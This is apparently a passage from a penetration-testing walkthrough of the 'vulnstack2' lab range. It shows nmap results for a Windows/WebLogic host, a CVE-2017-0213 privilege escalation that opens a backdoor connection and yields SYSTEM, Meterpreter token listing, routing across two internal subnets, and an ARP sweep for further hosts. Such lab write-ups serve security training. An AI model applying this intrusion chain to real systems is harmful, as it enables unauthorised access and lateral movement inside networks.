PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds 1433/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000.00; SP2 | ms-sql-ntlm-info: | Target_Name: DE1AY | NetBIOS_Domain_Name: DE1AY | NetBIOS_Computer_Name: WEB | DNS_Domain_Name: de1ay.com | DNS_Computer_Name: WEB.de1ay.com | DNS_Tree_Name: de1ay.com |_ Product_Version: 6.1.7601 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Issuer: commonName=SSL_Self_Signed_Fallback | Public Key type: rsa | Public Key bits: 1024 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2019-12-02T15:49:32 | Not valid after: 2049-12-02T15:49:32 | MD5: 3acd de46 da57 ca58 cfe4 7023 65f9 f4e3 |_SHA-1: e9dc 458e 8e07 30d5 520a c19b 2191 f6e7 5b3c 623d |_ssl-date: 2019-12-03T04:47:15+00:00; -1s from scanner time. 3389/tcp open tcpwrapped |_ssl-date: 2019-12-03T04:47:16+00:00; 0s from scanner time. 7001/tcp open http Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled) |_http-title: Error 404--Not Found |_weblogic-t3-info: T3 protocol in use (WebLogic version: 10.3.6.0) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC
COM Aggregate Marshaler/IRemUnknown2 Type Confusion EoP (CVE-2017-0213). Code from project-zero, mod by zcgonvh.
[+] Building Library with path: script:C:\Oracle\Middleware\user_projects\domains\base_domain\run.sct [+] Found TLB name at offset 0x2fe [+] Opened Link \??\C: -> \Device\HarddiskVolume1\Oracle\Middleware\user_projects\domains\base_domain: 00000164 [+] waitfor back connect.... [!] backdoor connected. [+] send command [whoami]. [!] process with pid: 4208 created. ============================== nt authority\system
Delegation Tokens Available ======================================== DE1AY\mssql IIS APPPOOL\DefaultAppPool NT AUTHORITY\IUSR NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM WEB\de1ay
Impersonation Tokens Available ======================================== NT AUTHORITY\ANONYMOUS LOGON
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Example: run post/multi/manage/autoroute OPTION=value [...] Local subnet: 10.10.10.0/255.255.255.0 Local subnet: 192.168.111.0/255.255.255.0
有两个网卡,都给加上路由。然后扫描存活主机
1 2 3 4 5 6 7 8 9 10 11
meterpreter > powershell_import /root/vulnstack2/Invoke-ARPScan.ps1 [+] File successfully imported. No result was returned. meterpreter > powershell_shell PS > Invoke-ARPScan -CIDR 10.10.10.0/24
MAC Address --- ------- 00:0C:29:25:A0:B6 10.10.10.10 00:0C:29:68:D3:6910.10.10.80 00:0C:29:43:3E:0B 10.10.10.201 00:0C:29:68:D3:6910.10.10.255